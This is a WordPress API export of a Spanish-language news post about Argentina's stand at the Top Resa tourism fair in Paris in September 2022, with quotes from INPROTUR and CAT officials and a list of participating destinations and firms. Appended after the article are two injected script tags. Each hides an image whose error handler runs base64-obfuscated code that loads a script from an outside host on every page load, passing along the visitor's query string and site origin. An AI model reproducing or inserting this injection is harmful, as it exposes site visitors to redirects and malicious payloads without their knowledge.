{"id":1533,"date":"2022-09-22T10:02:57","date_gmt":"2022-09-22T13:02:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1533"},"modified":"2025-08-14T00:34:44","modified_gmt":"2025-08-14T03:34:44","slug":"francia-exitosa-presentacion-de-argentina-en-top-resa","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1533","title":{"rendered":"FRANCIA: EXITOSA PRESENTACI\u00d3N DE ARGENTINA EN TOP RESA"},"content":{"rendered":"\n<h4 class=\"has-pale-cyan-blue-background-color has-background wp-block-heading\"><em>El pa\u00eds, de la mano del INPROTUR, est\u00e1 presente en la feria de turismo m\u00e1s importante de Francia para mostrar las novedades de Argentina con una destacada\u00a0delegaci\u00f3n.<\/em><\/h4>\n\n\n\n<p>Argentina participa una vez m\u00e1s de la feria de turismo\u00a0<strong>Top Resa\u00a0<\/strong>que se desarrolla en Paris, Francia, del 20 al 22\u00a0de septiembre coordinado por el\u00a0<strong>Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR)<\/strong>. La delegaci\u00f3n nacional encabezada por el\u00a0<strong>Secretario Ejecutivo del INPROTUR, Ricardo Sosa<\/strong>, cuenta con 12 empresas privadas y 8 destinos, m\u00e1s los representantes de la\u00a0<strong>C\u00e1mara Argentina de Turismo (CAT)<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci4.googleusercontent.com\/proxy\/5ygdB38tTKsUVo6SLg02dra9s2KqZxXCzZ-QFZAi6oNrzy4qbe226d81lWMHwHFwNbecNoYFSxxRjgUaVbu0ORLk9WaulJLA2MDfFTwtPaSeYmY48fJSFZGm1eOYYRQ3WI7mGzcQzr1mvy6hZg5DbVHxol58jp8=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/617a41bd-54f0-ec8a-f45d-d0da00c49e83.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Durante el primer d\u00eda de feria, se hizo el tradicional corte de cinta inaugurando el stand y las autoridades destacaron el trabajo en conjunto entre el sector p\u00fablico y privado. Ricardo Sosa indic\u00f3:&nbsp;<em>\u201cAqu\u00ed est\u00e1n presente los principales receptores de turistas franceses. Es importante que participen las provincias y muestra que todos tienen el foco en la recuperaci\u00f3n y la reactivaci\u00f3n del turismo proveniente de Francia. Estamos muy contentos de estar en Francia estamos con un proceso muy positivo\u201d<\/em>.<\/p>\n\n\n\n<p><em>\u201cFrancia es el segundo pa\u00eds europeo que m\u00e1s turistas emite hacia a nuestro pa\u00eds, por eso es muy importante que nos acompa\u00f1en tantas empresas y destinos de Argentina. Durante los \u00faltimos cuatro meses, el mercado franc\u00e9s lleg\u00f3 al 50% de recuperaci\u00f3n en comparaci\u00f3n a los niveles de la prepandemia, en 2019. Son n\u00fameros muy altos para el mercado y para lo que estiman las organizaciones de turismo mundiales.\u201d<\/em>, a\u00f1adi\u00f3 Sosa.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci6.googleusercontent.com\/proxy\/_AlDy2IXQBL1RaNeOp1eT0Q8P_Y1lbu5AAbY3bi0ILhvb54ZS6JGeE4b2UT9R1aTESoHwE6M6gZY2N7pY9jOg47r4ccy2bbDTM4BsGuOICAzlkdvrqX2IcXqcPogCgZu04U52MalA1iXc0WyfaSeRlZAu8GzoyI=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/85d59a91-9f0a-8c69-3976-31d8363da19b.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por su parte,&nbsp;<strong>Gustavo Hanni, Presidente de la CAT<\/strong>, tambi\u00e9n expres\u00f3:&nbsp;<em>\u201cEstos hermosos stands son el trabajo que se realiza codo a codo entre los privados y el sector p\u00fablico. Tenemos que estar presentes en todas las ferias del mundo. El turismo es el motor que puede sacar al&nbsp;pa\u00eds adelante\u201d<\/em>.<\/p>\n\n\n\n<p>Los destinos participantes son\u00a0<strong>Buenos Aires, Salta, Jujuy, Santa Cruz, Los Antiguos, Tucum\u00e1n, La Rioja y Bariloche. Por otra parte, convocadas por la CAT, participan Amahuaca, Designer Trips Argentina, Esteros Viajes, Eurotur, Furlong Incoming, Helling\u2019s Travel, Inspira Travel, Sake Wine &amp; Travel, Terra Patagonia, Vivaterra DMC, Turismo Tastil, Hotel Madero y Caf\u00e9 de los Angelitos\/Rojo Tango<\/strong>. Algunas de las empresas participan\u00a0<strong>por primera vez\u00a0<\/strong>en ferias de turismo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci4.googleusercontent.com\/proxy\/MDl2SXJkwTWPGyMGWuVd1gkWfun4M9RDgc0205XkdGQOo68q3Z-_5m2kUkoHkxJmGC9k6ucIpHs1Lg0DYQRQNJ3j-Nw8cP7FBDz1v5FeLwmj919J0XnXs6KZMqKJTZZhcpMMYEAs84rgijjnLXAnBtzotTbag44=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/58b5f4dd-c510-0a4b-e09c-f112e057d632.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Durante el primer d\u00eda se realiz\u00f3 una degustaci\u00f3n de gastronom\u00eda t\u00edpica argentina en el stand por parte de&nbsp;<strong><em>\u201cGusto Argentina\u201d<\/em><\/strong>, quien tiene locales en Par\u00eds y Madrid.<\/p>\n\n\n\n<p>Adem\u00e1s, las autoridades se reunieron con importantes tour operadores de Francia y ma\u00f1ana continuar\u00e1n las actividades con encuentros con varias l\u00edneas a\u00e9reas con el objetivo de incentivar a las empresas a aumentar sus frecuencias, generar cooperadas y aumentar el turismo emisivo de Francia hacia la Argentina.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentina.us10.list-manage.com\/track\/click?u=c72ee12e8482a64a249259cc5&amp;id=17d8397860&amp;e=1f1bd49e71\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/ci3.googleusercontent.com\/proxy\/K2gQq5qrjlYvCCf3D_JY5hqA3YC9k9Y8IZUqOL0fvSyJkCtpELlGmC0UpvDyxyqv5ih10M-iJWiTETYeZUvD4HCw5o7JBNjscMJ_XS9nL9vXtNKHCugpcwlAUnp-HJ8as9T_woK51xgg3f1S8gBu1vap4-20bg=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/5929452f-d06f-876d-f44c-b7e2ce1bca1c.png\" alt=\"\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El pa\u00eds, de la mano del INPROTUR, est\u00e1 presente en la feria de turismo m\u00e1s importante de Francia para mostrar las novedades de Argentina con una destacada\u00a0delegaci\u00f3n. Argentina participa una vez m\u00e1s de la feria de turismo\u00a0Top Resa\u00a0que se desarrolla en Paris, Francia, del 20 al 22\u00a0de septiembre coordinado por el\u00a0Instituto Nacional de Promoci\u00f3n Tur\u00edstica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1534,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,16,22],"tags":[],"class_list":{"0":"post-1533","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-ferias-y-congresos","9":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1533"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1533"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1533\/revisions"}],"predecessor-version":[{"id":7340,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1533\/revisions\/7340"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1534"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1533"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}